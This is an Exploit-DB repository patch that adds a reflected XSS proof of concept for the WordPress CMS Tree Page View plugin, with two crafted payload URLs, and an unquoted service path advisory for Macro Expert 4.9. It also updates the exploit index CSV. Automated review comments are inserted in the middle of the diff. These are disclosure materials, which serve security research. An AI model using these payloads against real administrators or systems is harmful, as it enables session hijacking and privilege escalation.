From ccfd0c515d364f5407082c26840219fc8235e9b0 Mon Sep 17 00:00:00 2001
From: Exploit-DB
Date: Wed, 7 Jun 2023 00:16:24 +0000
Subject: [PATCH] DB: 2023-06-07

3 changes to exploits/shellcodes/ghdb

Enrollment System Project v1.0 - SQL Injection Authentication Bypass (SQLI)
Tree Page View Plugin 1.6.7 - Cross Site Scripting (XSS)
GitLab v15.3 - Remote Code Execution (RCE) (Authenticated)
Macro Expert 4.9 - Unquoted Service Path
---
 exploits/php/webapps/51507.txt | 34 ++++++++++++++++++++++++++++++++
 exploits/windows/local/51506.txt | 25 +++++++++++++++++++++++
 files_exploits.csv | 6 ++++--
 3 files changed, 63 insertions(+), 2 deletions(-)
 create mode 100644 exploits/php/webapps/51507.txt
 create mode 100644 exploits/windows/local/51506.txt

diff --git a/exploits/php/webapps/51507.txt b/exploits/php/webapps/51507.txt
new file mode 100644
index 000000000..de014f8cb
--- /dev/null
+++ b/exploits/php/webapps/51507.txt
@@ -0,0 +1,34 @@
+# Exploit Title: Tree Page View Plugin 1.6.7 - Cross Site Scripting (XSS)
+# Google Dork: inurl:/wp-content/plugins/cms-tree-page-view/
+# Date: 2023-04-24
+# Exploit Author: LEE SE HYOUNG (hackintoanetwork)
+# Vendor Homepage: https://wordpress.org/plugins/cms-tree-page-view/
+# Software Link: https://downloads.wordpress.org/plugin/cms-tree-page-view.1.6.6.zip
+# Category: Web Application
+# Version: 1.6.7
+# Tested on: Debian / WordPress 6.1.1
+# CVE : CVE-2023-30868
+# Reference: https://patchstack.com/database/vulnerability/cms-tree-page-view/wordpress-cms-tree-page-view-plugin-1-6-7-cross-site-scripting-xss-vulnerability?_s_id=cve
+
+# 1. Technical Description:
+The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7.
+This is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed.
+
+
+# 2. Proof of Concept (PoC):
+
+WordPress CMS Tree Page View Plugin <= 1.6.7 Cross-Site Scripting (XSS)
+In the case of this vulnerability, there are two XSS PoCs available: one for version 1.6.6 and another for version 1.6.7.
+
+1. CMS Tree Page View Plugin <= 1.6.6
+
+ a. Send the following URL to users with administrator privileges or higher: http://localhost:8888/wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E.
+
+ b. your payload will be executed.

[!] note : To make the payload work, the "In menu" option under Settings -> CMS Tree Page View -> Select where to show a tree for pages and custom post types needs to be enabled for posts.
+
+2. CMS Tree Page View Plugin <= 1.6.7
+
+ a. Send the following URL to users with administrator privileges or higher: http://localhost:8888/wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22+accesskey%3DC+onclick%3Djavascript%3Aalert%281%29%3B+a%3D%22.
+
+ b. Your payload will execute the script when the user presses Ctrl + Alt + c (Mac) or Alt + Shift + c (Windows).
+
[!] note : To make the payload work, the "In menu" option under Settings -> CMS Tree Page View -> Select where to show a tree for pages and custom post types needs to be enabled for posts.
\ No newline at end of file
diff --git a/exploits/windows/local/51506.txt b/exploits/windows/local/51506.txt
new file mode 100644
index 000000000..fd7e99543
--- /dev/null
+++ b/exploits/windows/local/51506.txt
@@ -0,0 +1,25 @@
+# Exploit Title: Macro Expert 4.9 - Unquoted Service Path
+# Date: 04/06/2023
+# Exploit Author: Murat DEMIRCI
+# Vendor Homepage: http://www.macro-expert.com/
+# Software Link: http://www.macro-expert.com/product/gm_setup_4.9.exe
+# Version: 4.9
+# Tested on: Windows 10
+
+# Proof of Concept :
+
+C:\Users\Murat>sc qc "Macro Expert"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: Macro Expert
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : c:\program files (x86)\grasssoft\macro expert\MacroService.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Macro Expert
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+# If a malicious payload insert into related path and service is executed in anyway, this can gain new privilege access to the system and perform malicious acts.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index e4b75c62e..738f6653e 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
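Review bot: The `+This is due to the post_type parameter…` line in the new 51507.txt describes the roles backwards: it says users with administrator privileges can inject JavaScript, yet both PoC steps send the crafted URL *to* an administrator, so the administrator is the victim and the sender apparently needs no account of their own; it also says the code runs "whenever accessed", which contradicts the reflected (per-request) nature stated one line earlier. A rewording such as `As a result, anyone who gets an administrator to open a crafted URL can run JavaScript in that administrator's browser session.` states the actual risk. The `# Software Link:` line points at the 1.6.6 zip while `# Version:` says 1.6.7, and no fixed version is given beyond the Patchstack reference. The `[!] note` precondition (the "In menu" option enabled for posts) is repeated after each PoC; stating it once in the description would let readers judge exposure before reading the PoC.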
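Review bot: The new 51506.txt shows only the `sc qc` output, so the unquoted `BINARY_PATH_NAME` is established but nothing shows whether a low-privileged user can write to `c:\program files (x86)\grasssoft\` or `...\macro expert\`, which is what decides whether the path is exploitable at all; on a default install those directories are typically admin-writable only, so the closing `# If a malicious payload insert into related path…` sentence should be backed by the directory permissions observed on the test system or phrased as a condition. The `# Date: 04/06/2023` header is ambiguous (day/month vs month/day) where the other new file in this commit uses ISO `2023-04-24`. A mitigation line would round off the advisory, e.g. `# Fix: quote the service binary path so the service manager cannot split it at the spaces`.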
@@ -17799,7 +17799,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 3050,exploits/php/webapps/3050.txt,"Enigma 2 Coppermine Bridge - 'boarddir' Remote File Inclusion",2006-12-30,"Mehmet Ince",webapps,php,,2006-12-29,,1,OSVDB-33350;CVE-2006-6864,,,,,
 38862,exploits/php/webapps/38862.txt,"Enorth Webpublisher CMS - 'thisday' SQL Injection",2013-12-06,xin.wang,webapps,php,,2013-12-06,2015-12-04,1,CVE-2013-6985;OSVDB-100672,,,,,https://www.securityfocus.com/bid/64110/info
 28105,exploits/php/webapps/28105.txt,"eNpaper1 - 'Root_Header.php' Remote File Inclusion",2006-06-26,almaster,webapps,php,,2006-06-26,2013-09-05,1,,,,,,https://www.securityfocus.com/bid/18649/info
-51501,exploits/php/webapps/51501.txt,"Enrollment System Project v1.0 - SQL Injection Authentication Bypass (SQLI)",2023-06-04,"VIVEK CHOUDHARY",webapps,php,,2023-06-04,2023-06-04,0,CVE-2023-33584,,,,,
+51501,exploits/php/webapps/51501.txt,"Enrollment System Project v1.0 - SQL Injection Authentication Bypass (SQLI)",2023-06-04,"VIVEK CHOUDHARY",webapps,php,,2023-06-04,2023-06-06,1,CVE-2023-33584,,,,,
 26650,exploits/php/webapps/26650.txt,"Entergal MX 2.0 - Multiple SQL Injections",2005-11-29,r0t,webapps,php,,2005-11-29,2013-07-07,1,CVE-2005-3958;OSVDB-21164,,,,,https://www.securityfocus.com/bid/15631/info
 26916,exploits/php/webapps/26916.txt,"Enterprise Connector 1.0.2 - 'main.php' SQL Injection",2005-12-20,"Attila Gerendi",webapps,php,,2005-12-20,2013-07-18,1,CVE-2005-4563;OSVDB-22163,,,,,https://www.securityfocus.com/bid/15984/info
 42713,exploits/php/webapps/42713.txt,"Enterprise Edition Payment Processor Script 3.7 - SQL Injection",2017-09-14,"Ihsan Sencan",webapps,php,,2017-09-14,2017-09-14,0,,,,,,
@@ -30855,6 +30855,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 2471,exploits/php/webapps/2471.pl,"Travelsized CMS 0.4 - 'FrontPage.php' Remote File Inclusion",2006-10-03,Kacper,webapps,php,,2006-10-02,2016-12-01,1,OSVDB-29490;CVE-2006-5182,,,,http://www.exploit-db.comtravelsized-0.4.tar.bz2,
 31388,exploits/php/webapps/31388.txt,"Travelsized CMS 0.4.1 - 'index.php' Multiple Local File Inclusions",2008-03-12,muuratsalo,webapps,php,,2008-03-12,2014-02-04,1,CVE-2008-1324;OSVDB-43517,,,,,https://www.securityfocus.com/bid/28218/info
 2611,exploits/php/webapps/2611.txt,"Trawler Web CMS 1.8.1 - Multiple Remote File Inclusions",2006-10-21,k1tk4t,webapps,php,,2006-10-20,,1,OSVDB-29969;CVE-2006-5495;OSVDB-29968;OSVDB-29967;OSVDB-29966;OSVDB-29965;OSVDB-29964;OSVDB-29963;OSVDB-29962;OSVDB-29961;OSVDB-29960,,,,,
+51507,exploits/php/webapps/51507.txt,"Tree Page View Plugin 1.6.7 - Cross Site Scripting (XSS)",2023-06-06,"LEE SE HYOUNG",webapps,php,,2023-06-06,2023-06-06,0,CVE-2023-30868,,,,,
 42972,exploits/php/webapps/42972.rb,"Trend Micro InterScan Messaging Security (Virtual Appliance) - 'Proxy.php' Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",webapps,php,,2017-10-11,2018-01-18,0,,,,,,
 42895,exploits/php/webapps/42895.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - 'Host' Header Injection",2017-09-28,hyp3rlinx,webapps,php,,2017-09-28,2017-09-28,1,CVE-2017-14087,,,,,
 42893,exploits/php/webapps/42893.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Information Disclosure",2017-09-28,hyp3rlinx,webapps,php,,2017-09-28,2017-09-28,1,CVE-2017-14085,,,,,
@@ -34553,7 +34554,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50889,exploits/ruby/webapps/50889.txt,"GitLab 14.9 - Stored Cross-Site Scripting (XSS)",2022-04-26,Greenwolf,webapps,ruby,,2022-04-26,2022-05-11,0,CVE-2022-1175,,,,,
 49822,exploits/ruby/webapps/49822.txt,"GitLab Community Edition (CE) 13.10.3 - 'Sign_Up' User Enumeration",2021-05-03,4D0niiS,webapps,ruby,,2021-05-03,2021-06-07,0,,,,,,
 49821,exploits/ruby/webapps/49821.sh,"GitLab Community Edition (CE) 13.10.3 - User Enumeration",2021-05-03,4D0niiS,webapps,ruby,,2021-05-03,2021-06-07,0,,,,,,
-51181,exploits/ruby/webapps/51181.py,"GitLab v15.3 - Remote Code Execution (RCE) (Authenticated)",2023-04-01,"Antonio Francesco Sardella",webapps,ruby,,2023-04-01,2023-04-01,0,CVE-2022-2884,,,,,
+51181,exploits/ruby/webapps/51181.py,"GitLab v15.3 - Remote Code Execution (RCE) (Authenticated)",2023-04-01,"Antonio Francesco Sardella",webapps,ruby,,2023-04-01,2023-06-06,1,CVE-2022-2884,,,,,
 42961,exploits/ruby/webapps/42961.txt,"Metasploit Web UI < 4.14.1-20170828 - Cross-Site Request Forgery",2017-08-30,"Dhiraj Mishra",webapps,ruby,,2017-10-08,2020-08-22,1,CVE-2017-15084,,,,,
 39730,exploits/ruby/webapps/39730.txt,"NationBuilder - Multiple Persistent Cross-Site Scripting Vulnerabilities",2016-04-25,LiquidWorm,webapps,ruby,443,2016-04-25,2016-04-25,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5318.php
 39997,exploits/ruby/webapps/39997.txt,"Radiant CMS 1.1.3 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2016-06-21,"David Silveiro",webapps,ruby,80,2016-06-21,2016-06-21,0,,,,,http://www.exploit-db.comradiant-1.1.3.tar.gz,
@@ -40221,6 +40222,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49694,exploits/windows/local/49694.txt,"MacPaw Encrypto 1.0.1 - 'Encrypto Service' Unquoted Service Path",2021-03-22,"Ismael Nava",local,windows,,2021-03-22,2021-03-22,0,,,,,,
 40428,exploits/windows/local/40428.txt,"Macro Expert 4.0 - Multiple Privilege Escalations",2016-09-26,Tulpa,local,windows,,2016-09-26,2016-09-26,0,,,,,http://www.exploit-db.comgm_setup.exe,
 50431,exploits/windows/local/50431.txt,"Macro Expert 4.7 - Unquoted Service Path",2021-10-20,"Mert Daş",local,windows,,2021-10-20,2021-10-21,0,,,,,,
+51506,exploits/windows/local/51506.txt,"Macro Expert 4.9 - Unquoted Service Path",2023-06-06,"Murat DEMİRCİ",local,windows,,2023-06-06,2023-06-06,0,,,,,,
 36928,exploits/windows/local/36928.py,"Macro Toolworks 7.5 - Local Buffer Overflow",2012-03-08,"Julien Ahrens",local,windows,,2012-03-08,2015-05-07,1,OSVDB-80564,,,,,https://www.securityfocus.com/bid/52351/info
 30680,exploits/windows/local/30680.txt,"Macrovision SafeDisc - 'SecDRV.SYS' Method_Neither Privilege Escalation",2007-10-18,"Elia Florio",local,windows,,2007-10-18,2014-01-06,1,CVE-2007-5587;OSVDB-41429,,,,,https://www.securityfocus.com/bid/26121/info
 49017,exploits/windows/local/49017.txt,"Magic Mouse 2 utilities 2.20 - 'magicmouse2service' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,,2020-11-09,2020-11-09,0,,,,,,
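Review bot: The author in the added `+51506,…` row is spelled `"Murat DEMİRCİ"` (dotted capital İ) while the file it indexes, exploits/windows/local/51506.txt, credits `Murat DEMIRCI`; an author search will match only one of the two, so the same spelling should be used in both places. The row's date_published is 2023-06-06 while that file's header says `# Date: 04/06/2023` (and the `+51507,…` row in the earlier hunk has 2023-06-06 against a file date of 2023-04-24); if date_published is the site's publication date rather than the author's date that is expected, but the file headers should then use an unambiguous ISO date so the two cannot be confused.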